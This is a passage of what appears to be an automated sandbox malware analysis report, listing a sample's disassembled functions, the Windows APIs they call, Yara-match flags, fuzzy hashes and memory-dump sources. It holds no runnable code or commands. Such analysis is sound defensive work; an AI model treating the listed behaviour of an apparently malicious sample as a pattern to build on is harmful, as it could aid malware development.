                                                                  • Instruction ID: 8e0b76bb6c35fa1030474a654a12f6ca606bab1367b594b8588413907081c95e
                                                                  • Opcode Fuzzy Hash: 962a8472a63a494c35fba3ba6a56462e9634be2c334d1371b6710703fa2ac6f9
                                                                  • Instruction Fuzzy Hash: 8090027026258046C60017745F2964625D06B9970275105F96191E54F5DE7440405D19
                                                                  Function 00567BE0 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r{V
                                                                  • API String ID: 0-3874959824
                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction ID: 7547a280daf62bece5a9912f5ff5320ecb41f9330903bed8b78dce654b405011
                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction Fuzzy Hash: 0511AC72344104AFE754DE59DCC1EA677EAFB8C324B298065E904CB316E675EC41CB60
                                                                  Function 0064604E Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                                  • Instruction ID: 64e73347b27d96193e933e2be5be900b4b4704e63f64701868df5deba6109a95
                                                                  • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                                  • Instruction Fuzzy Hash: D2B14D316106089FD719CF28C486B957BE2FF46364F258658F899CF3A2C375EA92CB41
                                                                  Function 0063AC0C Relevance: .1, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                                  • Instruction ID: 3706870c7d0fd336ae813660b21942faf241decdbbc9b7789a2df66aabc7e769
                                                                  • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                                  • Instruction Fuzzy Hash: CE5146B1E006098FDB24CF94D8857AABBF1FF48315F24802AD445EB760D3759942DF99
                                                                  Function 0063BFF0 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction ID: fa79645b8b35bdde3b805aaa583de82a09556725003c3e10fe3f01b73303ac72
                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction Fuzzy Hash: 6D11E6B72001C1C3D61C8A3DD8B4AFBA797EAD5330F2D426AF0516B754D723A9459B80
                                                                  Function 00630042 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction ID: a001d1b96123b8c1fec73e420cd133c101559f4059f10a477b46003edffb971c
                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction Fuzzy Hash: 2A1170723401009FE758DE65DCE1FA673EAEB88320B298155E908CB312D775EC06C7A0
                                                                  Function 00404420 Relevance: 18.1, APIs: 12, Instructions: 82timefilepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 00404476
                                                                  • GetConsoleAliasExesW.KERNEL32(?,00000000), ref: 00404481
                                                                  • CallNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404491
                                                                  • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 0040449B
                                                                  • SetEndOfFile.KERNEL32(00000000), ref: 004044A3
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044B5
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004044B9
                                                                  • TlsSetValue.KERNEL32(00000000,00000000), ref: 004044C3
                                                                  • TlsFree.KERNEL32(00000000), ref: 004044CB
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044DD
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004044E3
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 004044F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: File$FormatModuleNameTime$AliasAttributesCallConsoleExesFreeHandleNamedObjectOpenPipeShortValue
                                                                  • String ID:
                                                                  • API String ID: 3844511171-0
                                                                  • Opcode ID: 1935943dd116d173574aa202059ca19e8382479f5388a712a89336f12b395794
                                                                  • Instruction ID: 6eef1a2b3a88ac42684db504e9d2595e70c362ee28e71386d382e67a0f303c74
                                                                  • Opcode Fuzzy Hash: 1935943dd116d173574aa202059ca19e8382479f5388a712a89336f12b395794
                                                                  • Instruction Fuzzy Hash: 5C21D635640304ABE350ABE4ED4AF997774FB48B02F104036F349B61E0CAB05984CB6A
                                                                  Function 0063C61B Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0063C73A
                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0063C848
                                                                  • _UnwindNestedFrames.LIBCMT ref: 0063C99A
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0063C9B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2751267872-393685449
                                                                  • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                                  • Instruction ID: 27fa5773238f0b875fee7c617692f6b4ca9aee66a48a3dab80d5ce54ee57146e
                                                                  • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                                  • Instruction Fuzzy Hash: 18B16571800209AFCF28DFA4C981AAEBBBABF18320F15455AF8157B242D731DA51CFD5
                                                                  Function 0040B133 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0040B13F
                                                                    • Part of subcall function 00408CA0: __getptd_noexit.LIBCMT ref: 00408CA3
                                                                    • Part of subcall function 00408CA0: __amsg_exit.LIBCMT ref: 00408CB0
                                                                  • __amsg_exit.LIBCMT ref: 0040B15F
                                                                  • __lock.LIBCMT ref: 0040B16F
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040B18C
                                                                  • InterlockedIncrement.KERNEL32(00722C40), ref: 0040B1B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                  • String ID: @,r$@xE
                                                                  • API String ID: 4271482742-2491494317
                                                                  • Opcode ID: 14da587c5bdc05ef8bc0ce193ba3e66b09e327f1db3aba0da4d18ea377a9ac98
                                                                  • Instruction ID: 3c6ac1de8d366cc5c0bc841ef81be65421d856afbd51984a86e4acfea4938c9b
                                                                  • Opcode Fuzzy Hash: 14da587c5bdc05ef8bc0ce193ba3e66b09e327f1db3aba0da4d18ea377a9ac98
                                                                  • Instruction Fuzzy Hash: 8C01A1319047219BDB21AB29A85975A73A0AF04B95F05013BE8107B3E2CB3CAD40CBDD
                                                                  Function 0064472C Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _strrchr
                                                                  • String ID:
                                                                  • API String ID: 3213747228-0
                                                                  • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                                  • Instruction ID: 1da27f92ed9117f5100c86c39a6ada96c517f4b38d76618bfbf882f7bb3b9621
                                                                  • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                                  • Instruction Fuzzy Hash: A0B16572E00295AFDB11CF68CC83BEE7BA6EF55310F244159E914AB382DB74D942C7A4
                                                                  Function 0040B89F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0040B8AB
                                                                    • Part of subcall function 00408CA0: __getptd_noexit.LIBCMT ref: 00408CA3
                                                                    • Part of subcall function 00408CA0: __amsg_exit.LIBCMT ref: 00408CB0
                                                                  • __getptd.LIBCMT ref: 0040B8C2
                                                                  • __amsg_exit.LIBCMT ref: 0040B8D0
                                                                  • __lock.LIBCMT ref: 0040B8E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                  • String ID: p}E
                                                                  • API String ID: 3521780317-932643814
                                                                  • Opcode ID: 2672bc7ca664fdd40ab9168032a27059e81ca72cc596f4e33d204ce2b74bd78f
                                                                  • Instruction ID: 41ca909a7fa17ccae20582b561b6b04ac6bde91f9f8c6f347843e093de949195
                                                                  • Opcode Fuzzy Hash: 2672bc7ca664fdd40ab9168032a27059e81ca72cc596f4e33d204ce2b74bd78f
                                                                  • Instruction Fuzzy Hash: ADF06D32A047049BD620BB76980275A73A4AF00759F51867FE441BB2E2DB7C9940CBAD
                                                                  Function 004060A8 Relevance: 7.6, APIs: 5, Instructions: 116fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 004060BF
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004060F0
                                                                  • GetLastError.KERNEL32 ref: 00406106
                                                                  • GetLastError.KERNEL32(?,004062A1,?,?,00000000,00455FA8,00000010,00404E93,00000000,?,74DEDFA0,74DEDFA0,?,00000000,?,00404EDC), ref: 00406166
                                                                  • __dosmaperr.LIBCMT ref: 004061A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$ByteCharFileMultiWideWrite__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 3779282958-0
                                                                  • Opcode ID: 101452add1fa48b778b1bf75d151f40d4cd8f46acbf92be4778b0df45f29199f
                                                                  • Instruction ID: 27c8a5566bd40633a4f567d6a347978cfff9d3da852d1c488ca5c9da231eff9c
                                                                  • Opcode Fuzzy Hash: 101452add1fa48b778b1bf75d151f40d4cd8f46acbf92be4778b0df45f29199f
                                                                  • Instruction Fuzzy Hash: FC417F31A02124CFDB21DB24CD44ADAB7B5FF06364F0501EAE40ABAAD1C7785E90CF96
                                                                  Function 00407E83 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00407EA1
                                                                    • Part of subcall function 0040656D: __mtinitlocknum.LIBCMT ref: 00406583
                                                                    • Part of subcall function 0040656D: __amsg_exit.LIBCMT ref: 0040658F
                                                                    • Part of subcall function 0040656D: EnterCriticalSection.KERNEL32(?,?,?,00405A32,00000004,00455F88,0000000C,0040AB49,74DEDFA0,?,00000000,00000000,00000000,?,00408C52,00000001), ref: 00406597
                                                                  • ___sbh_find_block.LIBCMT ref: 00407EAC
                                                                  • ___sbh_free_block.LIBCMT ref: 00407EBB
                                                                  • HeapFree.KERNEL32(00000000,74DEDFA0,00456048,0000000C,0040654E,00000000,00455FE8,0000000C,00406588,74DEDFA0,?,?,00405A32,00000004,00455F88,0000000C), ref: 00407EEB
                                                                  • GetLastError.KERNEL32(?,00405A32,00000004,00455F88,0000000C,0040AB49,74DEDFA0,?,00000000,00000000,00000000,?,00408C52,00000001,00000214), ref: 00407EFC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 2714421763-0
                                                                  • Opcode ID: 76e0c42db8dc044e1148e6d670b5a3e3ff1649617a1397201d3b724bef812557
                                                                  • Instruction ID: ac943536733178e3116658e9d7b5a01d31343d9a7912f5ecead2d15f24cb9749
                                                                  • Opcode Fuzzy Hash: 76e0c42db8dc044e1148e6d670b5a3e3ff1649617a1397201d3b724bef812557
                                                                  • Instruction Fuzzy Hash: 33017171D05201A6DB21AB72AC0675F36649F00769F10857EF511B61D2DB7CAD408A9E
                                                                  Function 004065A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: sE$0uE
                                                                  • API String ID: 3494438863-280079329
                                                                  • Opcode ID: 1e260c7051c8069211b872dd05f1ae6eaff2c6aa00f59d7a50ba6c9191058e07
                                                                  • Instruction ID: 5c3b15b56c07c431eec0f331a1747e63a73b6ae96789bc0a0f398cc4b72dc8a7
                                                                  • Opcode Fuzzy Hash: 1e260c7051c8069211b872dd05f1ae6eaff2c6aa00f59d7a50ba6c9191058e07
                                                                  • Instruction Fuzzy Hash: 5C11CA7230421167E7284F1DBC5066632D5E744724B29413FF516EB3E5FB78DC61454E
                                                                  Function 0040D438 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00407C8A), ref: 0040D43D
                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040D44D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                  • API String ID: 1646373207-3105848591
                                                                  • Opcode ID: d04afb31ecf6eacdaa9a74a1584815079827348a154b73a453fbb45ac7f3e72d
                                                                  • Instruction ID: 4dc727c415690c93b8a9960aa62b0e4da6991ad9cd5a9a87487a5a08f2fffa48
                                                                  • Opcode Fuzzy Hash: d04afb31ecf6eacdaa9a74a1584815079827348a154b73a453fbb45ac7f3e72d
                                                                  • Instruction Fuzzy Hash: 76F01D30A00A09A2DB002FA1AD0E6AF7F78BB80746F9105A1D5D6B00E5DE3491B9D24A
                                                                  Function 0040B861 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___addlocaleref.LIBCMT ref: 0040B873
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(74DEDFA0), ref: 0040B74B
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B758
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B765
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B772
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B77F
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B79B
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B7AB
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B7C1
                                                                  • ___removelocaleref.LIBCMT ref: 0040B87E
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(74DEDFA0), ref: 0040B7E2
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B7EF
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B7FC
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B809
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B816
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B832
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B842
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B858
                                                                  • ___freetlocinfo.LIBCMT ref: 0040B892
                                                                    • Part of subcall function 0040B5F0: ___free_lconv_mon.LIBCMT ref: 0040B636
                                                                    • Part of subcall function 0040B5F0: ___free_lconv_num.LIBCMT ref: 0040B657
                                                                    • Part of subcall function 0040B5F0: ___free_lc_time.LIBCMT ref: 0040B6DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                  • String ID: p}E
                                                                  • API String ID: 467427115-932643814
                                                                  • Opcode ID: dc0950cdbfca43cb46e8eada1e3bba07d17679a0d86d7d7e199d096445f6bc46
                                                                  • Instruction ID: 87dfc9db6cc6096610c3faad33b2f7d684f12c379cb45246b1d4642d53edf423
                                                                  • Opcode Fuzzy Hash: dc0950cdbfca43cb46e8eada1e3bba07d17679a0d86d7d7e199d096445f6bc46
                                                                  • Instruction Fuzzy Hash: 49E04F23501A2315CE363A1D680026B92ACCFD3756B1D41BFF808B72E6DB3D4C8045DD
                                                                  Function 0063C3C4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdjustPointer
                                                                  • String ID:
                                                                  • API String ID: 1740715915-0
                                                                  • Opcode ID: dc0238863d457a27e1bce2d0ac5b8b7f0b6a77dde26d3f9465aa75132b8b44d9
                                                                  • Instruction ID: fc583f7421d1c731fa57cde423b7f2310be3ba93bcb1b84ea747b87df87604c2
                                                                  • Opcode Fuzzy Hash: dc0238863d457a27e1bce2d0ac5b8b7f0b6a77dde26d3f9465aa75132b8b44d9
                                                                  • Instruction Fuzzy Hash: 4451B4726012069FDB299F14D861BBA77E6EF44320F14852DF90567292E731EC92C7D4
                                                                  Function 0040A62B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A65F
                                                                  • __isleadbyte_l.LIBCMT ref: 0040A693
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000), ref: 0040A6C4
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000), ref: 0040A732
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
